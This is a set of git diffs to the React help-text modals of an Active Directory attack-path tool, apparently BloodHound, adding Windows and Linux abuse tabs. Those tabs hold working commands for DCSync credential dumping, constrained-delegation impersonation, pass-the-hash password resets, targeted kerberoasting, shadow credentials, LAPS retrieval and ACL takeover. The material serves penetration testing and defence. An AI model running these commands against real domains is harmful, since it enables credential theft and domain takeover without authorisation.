+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/AllowedToDelegate/AllowedToDelegate.jsx
+++ b/src/components/Modals/HelpTexts/AllowedToDelegate/AllowedToDelegate.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -21,13 +22,16 @@ const AllowedToDelegate = ({
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

--- a/src/components/Modals/HelpTexts/AllowedToDelegate/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AllowedToDelegate/LinuxAbuse.jsx
@@ -1,14 +1,8 @@
 import React from 'react';
 
-const Abuse = () => {
+const LinuxAbuse = () => {
     return (
         <>
-            <p>
-                Abusing this privilege can utilize Benjamin Delpy's Kekeo
-                project, proxying in traffic generated from the Impacket
-                library, or using the Rubeus project's s4u abuse.
-            </p>
-
             <p>
                 In the following example, *victim* is the attacker-controlled
                 account (i.e. the hash is known) that is configured for
@@ -18,8 +12,7 @@ const Abuse = () => {
                 requests a TGT for the *victim* user and executes the
                 S4U2self/S4U2proxy process to impersonate the "admin" user to
                 the "HTTP/PRIMARY.testlab.local" SPN. The alternative sname
-                "cifs" is substituted in to the final service ticket and the
-                ticket is submitted to the current logon session. This grants
+                "cifs" is substituted in to the final service ticket. This grants
                 the attacker the ability to access the file system of
                 PRIMARY.testlab.local as the "admin" user.
             </p>
@@ -27,7 +20,7 @@ const Abuse = () => {
             <pre>
                 <code>
                     {
-                        'Rubeus.exe s4u /user:victim /rc4:2b576acbe6bcfda7294d6bd18041b8fe /impersonateuser:admin /msdsspn:"HTTP/PRIMARY.testlab.local" /altservice:cifs /ptt'
+                        "getST.py -spn 'HTTP/PRIMARY.testlab.local' -impersonate 'admin' -altservice 'cifs' -hashes :2b576acbe6bcfda7294d6bd18041b8fe 'domain/victim'"
                     }
                 </code>
             </pre>
@@ -35,4 +28,4 @@ const Abuse = () => {
     );
 };
 
-export default Abuse;
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/AllowedToDelegate/References.jsx
+++ b/src/components/Modals/HelpTexts/AllowedToDelegate/References.jsx
@@ -30,6 +30,9 @@ const References = () => {
             <a href='https://blog.harmj0y.net/redteaming/another-word-on-delegation/'>
                 https://blog.harmj0y.net/redteaming/another-word-on-delegation/
             </a>
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/delegations/constrained'>
+                https://www.thehacker.recipes/ad/movement/kerberos/delegations/constrained
+            </a>
         </>
     );
 };

--- a/src/components/Modals/HelpTexts/AllowedToDelegate/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AllowedToDelegate/WindowsAbuse.jsx
@@ -1,0 +1,38 @@
+import React from 'react';
+
+const WindowsAbuse = () => {
+    return (
+        <>
+            <p>
+                Abusing this privilege can utilize Benjamin Delpy's Kekeo
+                project, proxying in traffic generated from the Impacket
+                library, or using the Rubeus project's s4u abuse.
+            </p>
+
+            <p>
+                In the following example, *victim* is the attacker-controlled
+                account (i.e. the hash is known) that is configured for
+                constrained delegation. That is, *victim* has the
+                "HTTP/PRIMARY.testlab.local" service principal name (SPN) set in
+                its msds-AllowedToDelegateTo property. The command first
+                requests a TGT for the *victim* user and executes the
+                S4U2self/S4U2proxy process to impersonate the "admin" user to
+                the "HTTP/PRIMARY.testlab.local" SPN. The alternative sname
+                "cifs" is substituted in to the final service ticket and the
+                ticket is submitted to the current logon session. This grants
+                the attacker the ability to access the file system of
+                PRIMARY.testlab.local as the "admin" user.
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'Rubeus.exe s4u /user:victim /rc4:2b576acbe6bcfda7294d6bd18041b8fe /impersonateuser:admin /msdsspn:"HTTP/PRIMARY.testlab.local" /altservice:cifs /ptt'
+                    }
+                </code>
+            </pre>
+        </>
+    );
+};
+
+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/DCSync/DCSync.jsx
+++ b/src/components/Modals/HelpTexts/DCSync/DCSync.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -16,13 +17,16 @@ const DCSync = ({ sourceName, sourceType, targetName, targetType }) => {
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

--- a/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx
@@ -9,11 +9,11 @@ const LinuxAbuse = () => {
             </p>
 
             <pre>
-                    <code>
-                        {
-                            "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
-                        }
-                    </code>
+                <code>
+                    {
+                        "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
+                    }
+                </code>
             </pre>
 
             <p>

--- a/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx
@@ -11,7 +11,7 @@ const LinuxAbuse = () => {
             <pre>
                 <code>
                     {
-                        "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
+                        "secretsdump.py 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
                     }
                 </code>
             </pre>

--- a/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx
@@ -1,19 +1,21 @@
 import React from 'react';
 
-const Abuse = () => {
+const LinuxAbuse = () => {
     return (
         <>
             <p>
                 You may perform a dcsync attack to get the password hash of an
-                arbitrary principal using mimikatz:
+                arbitrary principal using impacket's secretsdump.py example script:
             </p>
+
             <pre>
-                <code>
-                    {
-                        'lsadump::dcsync /domain:testlab.local /user:Administrator'
-                    }
-                </code>
+                    <code>
+                        {
+                            "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
+                        }
+                    </code>
             </pre>
+
             <p>
                 You can also perform the more complicated ExtraSids attack to
                 hop domain trusts. For information on this see the blog post by
@@ -23,4 +25,4 @@ const Abuse = () => {
     );
 };
 
-export default Abuse;
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/DCSync/References.jsx
+++ b/src/components/Modals/HelpTexts/DCSync/References.jsx
@@ -10,6 +10,10 @@ const References = () => {
             <a href='https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/'>
                 https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync'>
+                https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
+            </a>
         </>
     );
 };

--- a/src/components/Modals/HelpTexts/DCSync/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/DCSync/WindowsAbuse.jsx
@@ -1,0 +1,26 @@
+import React from 'react';
+
+const WindowsAbuse = () => {
+    return (
+        <>
+            <p>
+                You may perform a dcsync attack to get the password hash of an
+                arbitrary principal using mimikatz:
+            </p>
+            <pre>
+                <code>
+                    {
+                        'lsadump::dcsync /domain:testlab.local /user:Administrator'
+                    }
+                </code>
+            </pre>
+            <p>
+                You can also perform the more complicated ExtraSids attack to
+                hop domain trusts. For information on this see the blog post by
+                harmj0y in the references tab.
+            </p>
+        </>
+    );
+};
+
+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/ForceChangePassword/ForceChangePassword.jsx
+++ b/src/components/Modals/HelpTexts/ForceChangePassword/ForceChangePassword.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -22,13 +23,16 @@ const ForceChangePassword = ({
                     targetType={targetType}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse sourceName={sourceName} sourceType={sourceType} />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse sourceName={sourceName} sourceType={sourceType} />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse sourceName={sourceName} sourceType={sourceType} />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

--- a/src/components/Modals/HelpTexts/ForceChangePassword/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/ForceChangePassword/LinuxAbuse.jsx
@@ -1,0 +1,49 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({ sourceName, sourceType }) => {
+    return (
+        <>
+            <p>
+                Use samba's net tool to change the user's password. The credentials can be supplied in cleartext
+                or prompted interactively if omitted from the command line. The new password will be prompted
+                if omitted from the command line.
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+
+            <p>
+                Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+            <p>
+                Now that you know the target user's plain text password, you can
+                either start a new agent as that user, or use that user's
+                credentials in conjunction with PowerView's ACL abuse functions,
+                or perhaps even RDP to a system the target user has access to.
+                For more ideas and information, see the references tab.
+            </p>
+        </>
+    );
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+};
+
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/ForceChangePassword/References.jsx
+++ b/src/components/Modals/HelpTexts/ForceChangePassword/References.jsx
@@ -18,6 +18,10 @@ const References = () => {
             <a href='https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4724'>
                 https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4724
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword'>
+                https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
+            </a>
         </>
     );
 };

--- a/src/components/Modals/HelpTexts/ForceChangePassword/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/ForceChangePassword/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({ sourceName, sourceType }) => {
+const WindowsAbuse = ({ sourceName, sourceType }) => {
     return (
         <>
             <p>
@@ -69,9 +69,9 @@ const Abuse = ({ sourceName, sourceType }) => {
     );
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
 };
 
-export default Abuse;
+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/GenericAll/GenericAll.jsx
+++ b/src/components/Modals/HelpTexts/GenericAll/GenericAll.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -23,8 +24,8 @@ const GenericAll = ({
                     targetType={targetType}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse
                     sourceName={sourceName}
                     sourceType={sourceType}
                     targetName={targetName}
@@ -32,10 +33,19 @@ const GenericAll = ({
                     targetId={targetId}
                 />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse
+                    sourceName={sourceName}
+                    sourceType={sourceType}
+                    targetName={targetName}
+                    targetType={targetType}
+                    targetId={targetId}
+                />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

--- a/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
@@ -386,50 +386,6 @@ const LinuxAbuse = ({
                     </p>
                 </>
             );
-        case 'OU':
-            return (
-                <>
-                    <h4>Control of the Organization Unit</h4>
-
-                    <p>
-                        With full control of the OU, you may add a new ACE on
-                        the OU that will inherit down to the objects under that
-                        OU. Below are two options depending on how targeted you
-                        choose to be in this step:
-                    </p>
-
-                    <h4>Generic Descendent Object Takeover</h4>
-                    <p>
-                        The simplest and most straight forward way to abuse
-                        control of the OU is to apply a GenericAll ACE on the OU
-                        that will inherit down to all object types. This
-                        can be done using Impacket's dacledit (cf. "grant rights"
-                        reference for the link).
-                    </p>
-
-                    <pre>
-                        <code>
-                            {
-                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'OUDistinguishedName' 'domain'/'user':'password'"
-                            }
-                        </code>
-                    </pre>
-
-                    <p>
-                        Now, the "JKOHLER" user will have full control of all
-                        descendent objects of each type.
-                    </p>
-
-                    <h4>Targeted Descendent Object Takeoever</h4>
-
-                    <p>
-                        If you want to be more targeted with your approach, it
-                        is possible to specify precisely what right you want to
-                        apply to precisely which kinds of descendent objects.
-                        Refer to the Windows Abuse info for this.
-                    </p>
-                </>
-            );
         case 'Container':
             return (
                 <>

--- a/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
@@ -1,0 +1,489 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({
+    sourceName,
+    sourceType,
+    targetName,
+    targetType,
+    targetId,
+    haslaps,
+}) => {
+    switch (targetType) {
+        case 'Group':
+            return (
+                <>
+                    <p>
+                        Full control of a group allows you to directly modify
+                        group membership of the group.
+                    </p>
+
+                    <p>
+                        Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
+                        or prompted interactively if omitted from the command line:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Finally, verify that the user was successfully added to the group:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+        case 'User':
+            return (
+                <>
+                    <p>
+                        Full control of a user allows you to modify properties
+                        of the user to perform a targeted kerberoast attack, and
+                        also grants the ability to reset the password of the
+                        user without knowing their current one.
+                    </p>
+
+                    <h4> Targeted Kerberoast </h4>
+
+                    <p>
+                        A targeted kerberoast attack can be performed using{' '}
+                        <a href='https://github.com/ShutdownRepo/targetedKerberoast'>targetedKerberoast.py</a>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        The tool will automatically attempt a targetedKerberoast
+                        attack, either on all users or against a specific one if
+                        specified in the command line, and then obtain a crackable hash.
+                        The cleanup is done automatically as well.
+                    </p>
+
+                    <p>
+                        The recovered hash can be cracked offline using the tool
+                        of your choice.
+                    </p>
+
+                    <h4> Force Change Password </h4>
+
+                    <p>
+                        Use samba's net tool to change the user's password. The credentials can be supplied in cleartext
+                        or prompted interactively if omitted from the command line. The new password will be prompted
+                        if omitted from the command line.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+                    <p>
+                        Now that you know the target user's plain text password, you can
+                        either start a new agent as that user, or use that user's
+                        credentials in conjunction with PowerView's ACL abuse functions,
+                        or perhaps even RDP to a system the target user has access to.
+                        For more ideas and information, see the references tab.
+                    </p>
+
+                    <h4> Shadow Credentials attack </h4>
+
+                    <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                    <pre>
+                        <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                    </pre>
+
+                    <p>
+                        For other optional parameters, view the pyWhisker documentation.
+                    </p>
+                </>
+            );
+        case 'Computer':
+            if (haslaps) {
+                return (
+                    <>
+                        <h4> Retrieve LAPS Password </h4>
+
+                        <p>
+                            Full control of a computer object is abusable when
+                            the computer's local admin account credential is
+                            controlled with LAPS. The clear-text password for
+                            the local administrator account is stored in an
+                            extended attribute on the computer object called
+                            ms-Mcs-AdmPwd. With full control of the computer
+                            object, you may have the ability to read this
+                            attribute, or grant yourself the ability to read the
+                            attribute by modifying the computer object's
+                            security descriptor.
+                        </p>
+
+                        <p>
+                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                             to retrieve LAPS passwords:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                }
+                            </code>
+                        </pre>
+
+                        <h4> Resource-Based Constrained Delegation </h4>
+
+                        <p>
+                            First, if an attacker does not control an account with an
+                            SPN set, a new attacker-controlled computer account can be
+                            added with Impacket's addcomputer.py example script:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            We can then get a service ticket for the service name (sname) we
+                            want to "pretend" to be "admin" for. Impacket's getST.py example script
+                            can be used for that purpose.
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            This ticket can then be used with Pass-the-Ticket, and could grant access
+                            to the file system of the TARGETCOMPUTER.
+                        </p>
+
+                        <h4> Shadow Credentials attack </h4>
+
+                        <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                        <pre>
+                            <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                        </pre>
+
+                        <p>
+                            For other optional parameters, view the pyWhisker documentation.
+                        </p>
+                    </>
+                );
+            } else {
+                return (
+                    <>
+                        <h4> Resource-Based Constrained Delegation </h4>
+
+                        <p>
+                            First, if an attacker does not control an account with an
+                            SPN set, a new attacker-controlled computer account can be
+                            added with Impacket's addcomputer.py example script:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            We can then get a service ticket for the service name (sname) we
+                            want to "pretend" to be "admin" for. Impacket's getST.py example script
+                            can be used for that purpose.
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            This ticket can then be used with Pass-the-Ticket, and could grant access
+                            to the file system of the TARGETCOMPUTER.
+                        </p>
+
+                        <h4> Shadow Credentials attack </h4>
+
+                        <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                        <pre>
+                            <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                        </pre>
+
+                        <p>
+                            For other optional parameters, view the pyWhisker documentation.
+                        </p>
+                    </>
+                );
+            }
+        case 'Domain':
+            return (
+                <>
+                    <h4> DCSync </h4>
+
+                    <p>
+                        The AllExtendedRights privilege grants {sourceName} both the
+                        DS-Replication-Get-Changes and
+                        DS-Replication-Get-Changes-All privileges, which combined
+                        allow a principal to replicate objects from the domain{' '}
+                        {targetName}.
+                    </p>
+
+                    <p>
+                        This can be abused using Impacket's secretsdump.py example script:
+                    </p>
+
+                    <pre>
+                            <code>
+                                {
+                                    "secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"
+                                }
+                            </code>
+                    </pre>
+
+                    <h4> Retrieve LAPS Passwords </h4>
+
+                    <p>
+                        The AllExtendedRights privilege also grants {sourceName} enough{' '}
+                        privileges, to retrieve LAPS passwords domain-wise.
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                         for that purpose:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+        case 'GPO':
+            return (
+                <>
+                    <p>
+                        With full control of a GPO, you may make modifications
+                        to that GPO which will then apply to the users and
+                        computers affected by the GPO. Select the target object
+                        you wish to push an evil policy down to, then use the
+                        gpedit GUI to modify the GPO, using an evil policy that
+                        allows item-level targeting, such as a new immediate
+                        scheduled task. Then wait at least 2 hours for the group
+                        policy client to pick up and execute the new evil
+                        policy. See the references tab for a more detailed write
+                        up on this abuse`;
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/Hackndo/pyGPOAbuse">pyGPOAbuse.py</a> can be used for that purpose.
+                    </p>
+                </>
+            );
+        case 'OU':
+            return (
+                <>
+                    <h4>Control of the Organization Unit</h4>
+
+                    <p>
+                        With full control of the OU, you may add a new ACE on
+                        the OU that will inherit down to the objects under that
+                        OU. Below are two options depending on how targeted you
+                        choose to be in this step:
+                    </p>
+
+                    <h4>Generic Descendent Object Takeover</h4>
+                    <p>
+                        The simplest and most straight forward way to abuse
+                        control of the OU is to apply a GenericAll ACE on the OU
+                        that will inherit down to all object types. This
+                        can be done using Impacket's dacledit (cf. "grant rights"
+                        reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'OUDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Now, the "JKOHLER" user will have full control of all
+                        descendent objects of each type.
+                    </p>
+
+                    <h4>Targeted Descendent Object Takeoever</h4>
+
+                    <p>
+                        If you want to be more targeted with your approach, it
+                        is possible to specify precisely what right you want to
+                        apply to precisely which kinds of descendent objects.
+                        Refer to the Windows Abuse info for this.
+                    </p>
+                </>
+            );
+        case 'OU':
+            return (
+                <>
+                    <h4>Control of the Organization Unit</h4>
+
+                    <p>
+                        With full control of the OU, you may add a new ACE on
+                        the OU that will inherit down to the objects under that
+                        OU. Below are two options depending on how targeted you
+                        choose to be in this step:
+                    </p>
+
+                    <h4>Generic Descendent Object Takeover</h4>
+                    <p>
+                        The simplest and most straight forward way to abuse
+                        control of the OU is to apply a GenericAll ACE on the OU
+                        that will inherit down to all object types. This
+                        can be done using Impacket's dacledit (cf. "grant rights"
+                        reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'OUDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Now, the "JKOHLER" user will have full control of all
+                        descendent objects of each type.
+                    </p>
+
+                    <h4>Targeted Descendent Object Takeoever</h4>
+
+                    <p>
+                        If you want to be more targeted with your approach, it
+                        is possible to specify precisely what right you want to
+                        apply to precisely which kinds of descendent objects.
+                        Refer to the Windows Abuse info for this.
+                    </p>
+                </>
+            );
+        case 'Container':
+            return (
+                <>
+                    <h4>Control of the Container</h4>
+
+                    <p>
+                        With full control of the container, you may add a new ACE on
+                        the container that will inherit down to the objects under that
+                        OU. Below are two options depending on how targeted you
+                        choose to be in this step:
+                    </p>
+
+                    <h4>Generic Descendent Object Takeover</h4>
+                    <p>
+                        The simplest and most straight forward way to abuse
+                        control of the OU is to apply a GenericAll ACE on the OU
+                        that will inherit down to all object types. This
+                        can be done using Impacket's dacledit (cf. "grant rights"
+                        reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'containerDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Now, the "JKOHLER" user will have full control of all
+                        descendent objects of each type.
+                    </p>
+
+                    <h4>Targeted Descendent Object Takeoever</h4>
+
+                    <p>
+                        If you want to be more targeted with your approach, it
+                        is possible to specify precisely what right you want to
+                        apply to precisely which kinds of descendent objects.
+                        Refer to the Windows Abuse info for this.
+                    </p>
+                </>
+            );
+    }
+    return <></>;
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+    targetName: PropTypes.string,
+    targetType: PropTypes.string,
+    targetId: PropTypes.string,
+    haslaps: PropTypes.bool,
+};
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
@@ -163,14 +163,14 @@ const LinuxAbuse = ({
                         </p>
 
                         <p>
-                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                            <a href='https://github.com/p0dalirius/pyLAPS'>pyLAPS</a> can be used
                              to retrieve LAPS passwords:
                         </p>
 
                         <pre>
                             <code>
                                 {
-                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                    'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                                 }
                             </code>
                         </pre>
@@ -308,14 +308,14 @@ const LinuxAbuse = ({
                     </p>
 
                     <p>
-                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                        <a href="https://github.com/p0dalirius/pyLAPS">pyLAPS</a> can be used
                          for that purpose:
                     </p>
 
                     <pre>
                         <code>
                             {
-                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                             }
                         </code>
                     </pre>

--- a/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
